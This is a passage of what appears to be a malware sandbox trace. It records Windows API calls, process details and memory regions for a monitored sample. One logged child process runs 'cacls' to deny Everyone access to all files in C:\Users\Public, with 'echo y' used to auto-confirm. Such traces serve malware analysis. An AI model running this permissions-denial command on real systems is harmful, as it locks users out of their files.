[0036.336] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.336] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.336] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0036.336] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0036.336] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0036.336] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0036.336] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0036.336] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0036.336] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0036.336] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0036.336] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf4fa68 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.336] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xf4fa68, lpFilePart=0xf4fa64 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xf4fa64*="Desktop") returned 0x1c [0036.336] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.336] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xf4f7e0 | out: lpFindFileData=0xf4f7e0) returned 0x13f4270 [0036.336] FindClose (in: hFindFile=0x13f4270 | out: hFindFile=0x13f4270) returned 1 [0036.336] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xf4f7e0 | out: lpFindFileData=0xf4f7e0) returned 0x13f4270 [0036.336] FindClose (in: hFindFile=0x13f4270 | out: hFindFile=0x13f4270) returned 1 [0036.336] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0036.336] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xf4f7e0 | out: lpFindFileData=0xf4f7e0) returned 0x13f4270 [0036.336] FindClose (in: hFindFile=0x13f4270 | out: hFindFile=0x13f4270) returned 1 [0036.336] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.337] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0036.337] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0036.337] GetEnvironmentStringsW () returned 0x13f60b0* [0036.337] FreeEnvironmentStringsA (penv="=") returned 1 [0036.337] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.337] GetConsoleOutputCP () returned 0x1b5 [0036.337] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.337] GetUserDefaultLCID () returned 0x409 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xf4fb94, cchData=128 | out: lpLCData="0") returned 2 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xf4fb94, cchData=128 | out: lpLCData="0") returned 2 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xf4fb94, cchData=128 | out: lpLCData="1") returned 2 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0036.338] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0036.338] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0036.339] GetConsoleTitleW (in: lpConsoleTitle=0x13f4d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.339] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.339] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0036.339] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0036.339] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0036.340] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.340] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.340] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.340] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.340] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.340] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.340] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.340] GetConsoleTitleW (in: lpConsoleTitle=0xf4f888, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.341] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.341] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.341] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.341] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.341] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.341] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.341] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.341] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.341] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.341] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.341] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0xf4f844 | out: _Buffer="y\r\n") returned 3 [0036.341] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.341] GetFileType (hFile=0x28) returned 0x3 [0036.341] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.341] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0036.341] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0xf4f834, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0xf4f834*=0x3, lpOverlapped=0x0) returned 1 [0036.341] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.341] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.342] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.342] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.342] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.342] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.342] SetConsoleInputExeNameW () returned 0x1 [0036.342] GetConsoleOutputCP () returned 0x1b5 [0036.342] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.342] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.342] exit (_Code=0) Process: id = "21" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x4085000" os_pid = "0xbd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\Users\\Public\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 884 start_va = 0x150000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 885 start_va = 0x170000 end_va = 0x171fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 886 start_va = 0x180000 end_va = 0x18efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 887 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 888 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 889 start_va = 0x210000 end_va = 0x213fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 890 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 891 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 892 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 893 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 894 start_va = 0x7eaf0000 end_va = 0x7eb12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eaf0000" filename = "" Region: id = 895 start_va = 0x7eb1b000 end_va = 0x7eb1bfff entry_point = 0x0 region_type = private name = "private_0x000000007eb1b000" filename = "" Region: id = 896 start_va = 0x7eb1c000 end_va = 0x7eb1efff entry_point = 0x0 region_type = private name = "private_0x000000007eb1c000" filename = "" Region: id = 897 start_va = 0x7eb1f000 end_va = 0x7eb1ffff entry_point = 0x0 region_type = private name = "private_0x000000007eb1f000" filename = "" Region: id = 898 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 899 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 900 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 901 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 902 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 903 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 904 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 905 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 906 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 907 start_va = 0x160000 end_va = 0x163fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 908 start_va = 0x170000 end_va = 0x173fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 909 start_va = 0x240000 end_va = 0x2bdfff entry_point = 0x240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 910 start_va = 0x2c0000 end_va = 0x2c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 911 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 912 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x2e0000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Region: id = 913 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 914 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 915 start_va = 0x5c0000 end_va = 0x894fff entry_point = 0x5c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 916 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 917 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 918 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 919 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 920 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 921 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 922 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 923 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 924 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 925 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 926 start_va = 0x7e9f0000 end_va = 0x7eaeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9f0000" filename = "" Thread: id = 23 os_tid = 0xbd4 Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xe713000" os_pid = "0xbd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 927 start_va = 0xb0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 928 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 929 start_va = 0xe0000 end_va = 0xeefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 930 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 931 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 932 start_va = 0x230000 end_va = 0x233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 933 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 934 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 935 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 936 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 937 start_va = 0x7e7d0000 end_va = 0x7e7f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7d0000" filename = "" Region: id = 938 start_va = 0x7e7f4000 end_va = 0x7e7f4fff entry_point = 0x0 region_type = private name = "private_0x000000007e7f4000" filename = "" Region: id = 939 start_va = 0x7e7fc000 end_va = 0x7e7fefff entry_point = 0x0 region_type = private name = "private_0x000000007e7fc000" filename = "" Region: id = 940 start_va = 0x7e7ff000 end_va = 0x7e7fffff entry_point = 0x0 region_type = private name = "private_0x000000007e7ff000" filename = "" Region: id = 941 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 942 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 943 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 944 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 963 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 964 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 965 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 966 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 967 start_va = 0xb0000 end_va = 0xbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 968 start_va = 0x260000 end_va = 0x2ddfff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 969 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 970 start_va = 0x600000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 971 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 972 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 973 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 974 start_va = 0x7e6d0000 end_va = 0x7e7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6d0000" filename = "" Region: id = 975 start_va = 0xc0000 end_va = 0xc3fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Thread: id = 24 os_tid = 0xbdc [0036.459] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0036.459] __set_app_type (_Type=0x1) [0036.459] __p__fmode () returned 0x76ea1768 [0036.460] __p__commode () returned 0x76ea176c [0036.460] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0036.460] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0036.460] GetCurrentThreadId () returned 0xbdc [0036.460] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbdc) returned 0x30 [0036.460] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.460] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0036.460] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0036.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fa38 | out: phkResult=0x22fa38*=0x0) returned 0x2 [0036.462] VirtualQuery (in: lpAddress=0x22fa47, lpBuffer=0x22f9e0, dwLength=0x1c | out: lpBuffer=0x22f9e0*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.462] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f9e0, dwLength=0x1c | out: lpBuffer=0x22f9e0*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0036.462] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f9e0, dwLength=0x1c | out: lpBuffer=0x22f9e0*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0036.462] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f9e0, dwLength=0x1c | out: lpBuffer=0x22f9e0*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.462] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f9e0, dwLength=0x1c | out: lpBuffer=0x22f9e0*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0036.462] GetConsoleOutputCP () returned 0x1b5 [0036.462] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.462] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0036.462] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.462] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.462] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.462] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.462] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.462] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.463] GetEnvironmentStringsW () returned 0x604058* [0036.463] FreeEnvironmentStringsA (penv="=") returned 1 [0036.463] GetEnvironmentStringsW () returned 0x604058* [0036.463] FreeEnvironmentStringsA (penv="=") returned 1 [0036.463] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e988 | out: phkResult=0x22e988*=0x40) returned 0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x0, lpData=0x22e994*=0xec, lpcbData=0x22e98c*=0x1000) returned 0x2 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x4, lpData=0x22e994*=0x1, lpcbData=0x22e98c*=0x4) returned 0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x0, lpData=0x22e994*=0x1, lpcbData=0x22e98c*=0x1000) returned 0x2 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x4, lpData=0x22e994*=0x0, lpcbData=0x22e98c*=0x4) returned 